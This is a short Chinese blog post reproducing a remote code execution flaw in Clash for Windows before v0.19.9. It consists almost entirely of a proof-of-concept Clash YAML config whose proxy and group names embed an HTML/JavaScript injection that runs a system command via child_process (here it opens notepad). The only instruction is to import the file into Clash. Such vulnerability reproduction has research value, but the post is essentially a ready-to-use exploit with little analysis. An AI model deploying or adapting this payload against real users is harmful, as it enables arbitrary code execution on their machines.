Clash Rce漏洞复现

发表于2022-03-31|更新于2022-09-17|漏洞复现

|字数总计:125|阅读时长:1分钟

影响范围

Windows v0.19.9版以下

POC

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("notepad.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("notepad.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("notepad.exe");`);>

导入Clash配置文件里面

文章作者: W啥都学

文章链接: https://www.zssnp.top/2022/03/31/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Clash%20Rce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 ZSSのW啥都学！

打赏

微信
支付宝

相关推荐

CVE-2012-2122Mysql身份认证漏洞及利用复现

Office漏洞复现：CVE-2021-40444远程代码执行

DedeCMS-V5.7SP2后台代码执行漏洞复现

MetInfo4.0任意用户密码修改漏洞复现

Office漏洞复现CVE-2017-11882

OpenSSH 漏洞复现用户名枚举漏洞(CVE-2018-15473)

本地搜索